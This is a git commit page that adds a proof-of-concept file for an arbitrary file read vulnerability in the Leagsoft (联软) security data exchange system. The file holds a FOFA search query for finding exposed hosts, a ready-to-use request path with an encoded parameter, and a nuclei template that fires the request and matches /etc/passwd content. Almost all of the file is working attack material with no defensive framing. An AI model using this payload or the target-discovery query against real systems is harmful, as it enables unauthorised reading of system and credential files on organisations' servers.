admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Create 联软安全数据交换系统任意文件读取.md

Browse Source
This commit is contained in:
wy876 2024-01-30 19:42:04 +08:00 committed by GitHub
parent a99c83248d
commit b929fd9945
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 41 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

41
联软安全数据交换系统任意文件读取.md Normal file
View File

@ -0,0 +1,41 @@
## 联软安全数据交换系统任意文件读取
## fofa
```
body="UniExServices"
```
## poc
```
/UniExServices/poserver.zz?pgop=opendiskdoc&id=KmcgY3MtK3IpLSRfOXE9YmpkL2orbBdrKztnJCltInIrbDhyP24rOzhjPHI=
```
## nuclei
```
id: leagsoft-safedata-exchange-file-fileread
info:
name: 联软安全数据交换系统任意文件读取
author: mmy
severity: high
tags: leagsoft,fileread
description: 联软安全数据交换系统任意文件读取
reference:
-
metadata:
fofa-query: 'body="UniExServices"'
verified: true
max-request: 1
http:
- method: GET
path:
- "{{RootURL}}/UniExServices/poserver.zz?pgop=opendiskdoc&id=KmcgY3MtK3IpLSRfOXE9YmpkL2orbBdrKztnJCltInIrbDhyP24rOzhjPHI="
matchers:
- type: regex
part: body
regex:
- "root:[x*]:0:0:"
```